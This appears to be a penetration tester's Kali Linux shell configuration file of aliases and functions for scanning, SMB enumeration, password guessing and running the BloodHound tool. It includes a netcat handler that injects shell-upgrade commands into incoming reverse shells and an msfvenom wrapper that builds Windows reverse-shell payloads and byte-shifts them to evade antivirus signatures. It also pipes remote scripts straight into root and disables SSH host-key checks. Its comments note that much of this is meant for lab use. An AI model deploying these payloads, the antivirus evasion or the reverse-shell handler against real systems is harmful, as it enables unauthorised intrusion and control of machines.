rshell add PATH
##################################################
# Extra tools
# $ sudo apt install -y bloodhound-ce-python chisel dirsearch enum4linux-ng feroxbuster goshs gobuster grc mssqlpwner nishang peass powercat rlwrap seclists shellter sshpass
# urlencode:
# $ sudo apt install gridsite-clients
# csharp:
# $ sudo apt install mono-csharp-shell
# Install flatpak
# -> https://www.kali.org/docs/tools/flatpak/
# Python2 pip (this pipes a remote script straight into a root interpreter; if you care about supply chain, download get-pip.py first, inspect it, then run it)
# $ sudo sh -c "curl https://bootstrap.pypa.io./pip/2.7/get-pip.py | python2"
# Cool Hollywood screensaver ❤️
# $ sudo apt install kali-screensaver
# Sudo without password (passwordless root for the kali user — convenient on a disposable lab VM, not for a machine that holds anything you value)
# $ sudo dpkg-reconfigure kali-grant-root
# Resources
# accesschk.exe
# https://web.archive.org/web/20080530012252/http://live.sysinternals.com/accesschk.exe
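# ANSI colour escapes used by the helper functions further down.
reset=$'\E[0;0m'
bold=$'\E[1m'
red=$'\E[31m'
green=$'\E[32m'
blue=$'\E[34m'
# The trailing space makes the shell alias-expand the word after `sudo` as well,
# so `sudo nmap` still picks up the `nmap` alias defined below.
alias sudo='sudo '
alias xclip='xclip -selection c'
# Non-interactive full upgrade as root, followed by flatpak housekeeping.
alias update='sudo sh -c "
set -e
export DEBIAN_FRONTEND=noninteractive
dpkg --configure -a
apt update
apt -y --fix-broken --fix-missing full-upgrade
apt -y autoremove --purge
"
echo
echo Flatpak:
flatpak update && flatpak remove --unused
'
alias rdesktop='rdesktop -k es'
# SECURITY: host-key verification is switched off for lab convenience. Any key
# presented by an *unknown* host is accepted silently, so a man-in-the-middle
# between you and a fresh target goes unnoticed (a mismatching entry already in
# known_hosts is still rejected). Use `command ssh` for anything outside the lab.
alias ssh='ssh -o "StrictHostKeyChecking no"'
# Same host-key caveat as `ssh`. In addition, `sshpass -p <password>` shows the
# password to every local user via `ps`; prefer `-e` (SSHPASS env var) or
# `-f <file>`. The `;` before `}` is mandatory in bash (zsh tolerates its absence).
alias sshpass='_sshpass(){ sshpass "$@" -o "StrictHostKeyChecking no"; }; _sshpass'
# An alias is a plain prefix substitution, so the URL typed after `gobusterdir`
# lands right after -u (the former trailing `"$@"` only expanded the shell's own
# positional parameters, which are empty in an interactive session).
# -k disables TLS certificate verification: fine for self-signed lab targets only.
alias gobusterdir='gobuster dir -w /usr/share/seclists/Discovery/Web-Content/combined_words.txt -k -u'
alias john='john -w=/usr/share/wordlists/rockyou.txt'
alias nikto='nikto -host'
alias nmap='sudo grc nmap'
alias wapiti='wapiti --color --url'
alias wfuzz='wfuzz -c'
alias whatweb='whatweb -a 3'
alias wpscan='wpscan --rua -e ap,at,tt,cb,dbe,u,m --passwords /usr/share/wordlists/seclists/Passwords/probable-v2-top1575.txt --url'
# Both servers expose the *current directory* to everyone who can reach the
# port, with no authentication. Start them from a scratch directory, never $HOME.
alias webserver='goshs -p 80'
alias smbserver='impacket-smbserver share . -smb2support'
# Tunnelled variants. nmap is forced to -sT/-Pn/-n because raw sockets and DNS
# do not traverse a SOCKS proxy. proxy_gobusterdir relies on gobuster honouring
# HTTP_PROXY (`--proxy` is the explicit form) and on the shell expanding an
# alias that follows an assignment word — zsh does, bash does not.
alias proxy_nmap='sudo proxychains -q grc nmap -v -n -Pn -sT'
alias proxy_hydra='sudo proxychains -q hydra'
alias proxy_gobusterdir='HTTP_PROXY=socks5://127.0.0.1:9090/ gobusterdir'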
# ==============================================================================
## bloodhound-ce automates the installation of bloodhound-ce, runs it and highlights the default password for new installations
# -------------
## Usage:
# $ bloodhound-ce
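bloodhound-ce() {
  local waited=0 max_wait=600
  # Kali packages the compose tool as `docker-compose`; install it on first use.
  # (The `;` before `}` that bash requires in `{ ...; }` was missing here.)
  if ! command -v docker-compose >/dev/null 2>&1; then
    sudo apt update || return 1
    sudo apt -y install docker-compose || return 1
  fi
  # SECURITY: this pipes a compose file fetched through a redirecting short URL
  # straight into a root docker-compose, which pulls and runs whatever images it
  # names. If that is a concern, `curl -L https://ghst.ly/getbhce -o docker-compose.yml`,
  # read it, then `sudo docker-compose up` from the inspected file instead.
  # The grep keeps every line streaming and highlights the `#...#` line that
  # carries the default password of a new installation.
  curl -L https://ghst.ly/getbhce | sudo docker-compose -f - up | grep -E --color=always '#.+#|^' &
  # Wait for the web UI to answer. Image pulls on a fresh box can take minutes,
  # so the wait is long but bounded rather than infinite.
  until curl -s -o /dev/null http://127.0.0.1:8080; do
    if [ "$waited" -ge "$max_wait" ]; then
      printf '\nbloodhound-ce: UI not reachable after %ss; check the compose log above\n' "$max_wait" >&2
      return 1
    fi
    printf '...'
    sleep 1
    waited=$((waited + 1))
  done
  xdg-open http://127.0.0.1:8080
}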
# ==============================================================================
## wordlists lists useful wordlists and resources
# ---------
## Usage:
# $ wordlists
wordlists() {
  local web_dir=/usr/share/seclists/Discovery/Web-Content
  local pw_dir=/usr/share/seclists/Passwords
  # Banner in bold green, then back to default attributes.
  printf '%s\n' "${green}${bold}"
  figlet Wordlists
  printf '%s\n' "${reset}"
  # Sizes of the two combined web-content lists, indented by one space.
  printf '%s\n' "${bold}Web server enumeration:${reset}"
  du -h "${web_dir}/combined_words.txt" "${web_dir}/combined_directories.txt" | sed 's/^/ /'
  printf '%s\n' " [i] Useful file extensions: php,asp,aspx,cgi,jsp,ini,config,cfg,xml,htm,html,json,bak,txt,zip"
  printf '\n'
  # Short lists suited to online (rate-limited) guessing.
  printf '%s\n' "${bold}Online credentials:${reset}"
  printf '%s\n' " > ${pw_dir}/probable-v2-top1575.txt" " > ${pw_dir}/Common-Credentials/10k-most-common.txt"
  printf '\n'
  # The big one, for offline hash cracking.
  printf '%s\n' "${bold}Password Hash cracking:${reset}" " > /usr/share/wordlists/rockyou.txt"
  printf '%s\n' "________________________________________________________________________________________"
  # Finish with the distribution's own `wordlists` listing (bypassing this function).
  command wordlists
}
# ==============================================================================
## nmapfast runs a quick scan for the specified target, with colors!
# --------
## Usage:
# $ nmapfast <target>
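nmapfast() {
  local target=$1 nmap_output ports
  if [ -z "$target" ]; then
    printf 'Usage: nmapfast <target>\n' >&2
    return 2
  fi
  nmap_output=$(mktemp) || return 1
  # Phase 1: full-range TCP SYN sweep. Raw-socket scans (-sS/-sU) need root, so
  # go through sudo like the `nmap` alias does (harmless when already root).
  # `\nmap` defeats alias expansion in both bash and zsh: the alias adds grc,
  # whose colouring would fight the streaming sed below (-u = line-buffered).
  sudo \nmap -n -sS -Pn -T4 --min-rate 1000 -p- -v "$target" -oN "$nmap_output" \
    | sed -u 's|[0-9]\+/tcp|\x1b\[1;32m\0\x1b\[0m|'
  # Collect the "<port>/tcp ..." rows of the saved report into a comma list.
  ports=$(grep -E '^[0-9]+/tcp' -- "$nmap_output" | cut -d/ -f1 | paste -sd, -)
  rm -f -- "$nmap_output"
  echo ""
  echo "======================================="
  echo ""
  echo " PORTS"
  echo " -----"
  echo " ${bold}${red}${ports}${reset}"
  echo ""
  # Phase 2: default scripts + version detection on the ports found above.
  # An empty -p makes nmap abort, so skip the phase when nothing was found.
  if [ -n "$ports" ]; then
    grc nmap -n -Pn -sT -p"$ports" -sC -sV "$target"
  else
    echo " (no TCP ports reported; skipping -sC/-sV)"
  fi
  echo ""
  echo "======================================="
  echo ""
  # Phase 3: quick UDP sweep of the 100 most common ports, highlighted blue.
  sudo \nmap -n -Pn -sU --top-ports 100 -v "$target" | sed -u 's|[0-9]\+/udp|\x1b\[1;34m\0\x1b\[0m|'
}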
# ==============================================================================
## smbtest runs all the possible tests to check if a target machine is running an SMB server
# -------
## Usage:
# $ smbtest <target>
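smbtest() {
  local target=$1 smbmap_output
  if [ -z "$target" ]; then
    printf 'Usage: smbtest <target>\n' >&2
    return 2
  fi
  # Null-session share enumeration. smbmap marks failures with a "[!]" line;
  # only when none is present is its listing shown (WRITE in red, READ in green).
  smbmap_output=$(smbmap -H "$target" -u %)
  if ! printf '%s\n' "$smbmap_output" | grep -qF '[!]'; then
    printf '%s\n' "$smbmap_output" \
      | sed 's/WRITE/\x1b\[1;31m\0\x1b[0m/; s/READ/\x1b\[1;32m\0\x1b[0m/;'
  else
    # Fall back to smbclient: empty user first, then the classic anonymous login.
    smbclient -L "//$target/" -U % --no-pass \
      || smbclient -L "//$target/" -U anonymous --no-pass
  fi
  echo
  # Bring up the msf database, then fingerprint the SMB version and list known
  # vulns for the host. $target is spliced into the msfconsole command string,
  # so pass only a host/IP here, never anything containing ';'.
  sudo msfdb init \
    && msfconsole -q -x "use auxiliary/scanner/smb/smb_version; set rhost ${target}; run; vulns ${target}; exit"
}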
# ==============================================================================
## rshell is a netcat wrapper for linux/unix reverse shell connections that handles all the necessary bits to have an interactive shell.
# ------
## Usage:
# $ rshell <netcat_parameters...>
# $ rshell -lp 443
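rshell() {
  # Refuse to put the terminal into raw mode when there is nothing to listen on.
  if [ "$#" -eq 0 ]; then
    printf 'Usage: rshell <netcat_parameters...>\n       rshell -lp 443\n' >&2
    return 2
  fi
  local rows cols saved
  # Capture the local terminal geometry before going raw, so the remote PTY can
  # be resized to match (defaults below only matter when there is no tty).
  read -r rows cols < <(stty size)
  # Remember the exact current settings so they can be restored afterwards
  # (more faithful than a blanket `stty sane`).
  saved=$(stty -g)
  stty raw -echo
  # Everything ahead of the local stdin (`-`) is injected into the remote shell
  # as soon as the connection comes in. NOTE: the listener itself has no
  # authentication — whoever connects first gets the session.
  # The heredoc delimiters are quoted so that $PYTHON, $(whoami) etc. expand on
  # the REMOTE side; the only values that must come from the LOCAL side
  # (rows/cols) are spliced in with printf between the two heredocs. The
  # original single quoted heredoc sent the literal text `$rows`/`$cols`.
  # Used ': ; ' to differentiate actual code from injected code (does nothing)
  cat <(cat << 'EOF'
: ; export TERM=xterm-256color
: ; export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
: ;
: ; # Upgrade shell to a proper PTY
: ; for PYTHON in $(which python python2 python3); do : ; done
: ; if [ -x "$PYTHON" ]; then
: ; [ -x /bin/bash ] && exec "$PYTHON" -c 'import pty; pty.spawn(("/bin/bash", "--rcfile", "/etc/skel/.bashrc", "-p"))'
: ; exec "$PYTHON" -c 'import pty; pty.spawn(("/bin/sh",))'
: ; elif command -v script >/dev/null 2>&1; then
: ; exec script -q -c /bin/bash /dev/null
: ; fi
: ;
: ; # Set terminal size to match the local terminal
EOF
) <(printf ': ; stty rows %s cols %s\n' "${rows:-24}" "${cols:-80}") <(cat << 'EOF'
: ;
: ; # Display system information after connection
: ; clear; \
: ; { \
: ; . /etc/os-release; \
: ; printf "\033[1;32m\==========( \033[1;31m$(whoami)@$(hostname) \033[1;32m)===========/\n"; \
: ; printf "\033[1;32m| \033[1;34mOS\033[0m :: %s\n" "${PRETTY_NAME:-Unknown OS}"; \
: ; printf "\033[1;32m| \033[1;34mKernel\033[0m :: %s\n" "$(uname -r -s -m)"; \
: ; printf "\033[1;32m| \033[1;34mGroups\033[0m :: %s\n" "$(groups)"; \
: ; printf "\033[1;32m\\____________________________________________________________\n\033[0m"; \
: ; echo; \
: ; ip --color=auto address || ifconfig; \
: ; echo; \
: ; } 2>/dev/null
EOF
) - | nc "$@"
  # Restore the terminal exactly as it was (fall back to sane if stty -g failed).
  stty "${saved:-sane}"
}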
# ==============================================================================
## caesar_cipher_msfvenom is a wrapper for msfvenom that obfuscates the output payload with a byte-wise caesar shift (this is obfuscation, not encryption)
# ----------------------
## Usage:
# $ caesar_cipher_msfvenom <key> <msfvenom_parameters . . .>
# $ caesar_cipher_msfvenom 4 -p windows/x64/shell_reverse_tcp LHOST=192.168.45.164 LPORT=443
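caesar_cipher_msfvenom() {
  local key=$1 payload
  if [ "$#" -lt 2 ]; then
    printf 'Usage: caesar_cipher_msfvenom <key> <msfvenom_parameters...>\n' >&2
    return 2
  fi
  # The key is spliced verbatim into the C# source below, so insist on an integer.
  if ! [[ "$key" =~ ^-?[0-9]+$ ]]; then
    printf 'caesar_cipher_msfvenom: key must be an integer, got %q\n' "$key" >&2
    return 2
  fi
  shift
  # Ask msfvenom for the raw bytes as a C# array named `buf`; bail out instead
  # of feeding an empty array to the C# snippet when generation fails.
  payload=$(msfvenom "$@" -f csharp -v buf) || return 1
  echo
  echo
  # Add <key> to every byte (mod 256) and print the result as a fresh C# array.
  # This only defeats static signatures; the loader must subtract the same key
  # before executing the buffer.
  csharp << EOF
using System.Text;
${payload}
for (int i = 0; i < buf.Length; i++)
    buf[i] = (byte)(((uint)buf[i] + ${key}) & 0xFF);
StringBuilder hex = new StringBuilder(buf.Length * 2);
foreach (byte b in buf)
    hex.AppendFormat("0x{0:x2}, ", b);
Console.WriteLine("byte[] buf = new byte[] { " + hex.ToString().Substring(0, hex.Length - 2) + " };");
EOF
}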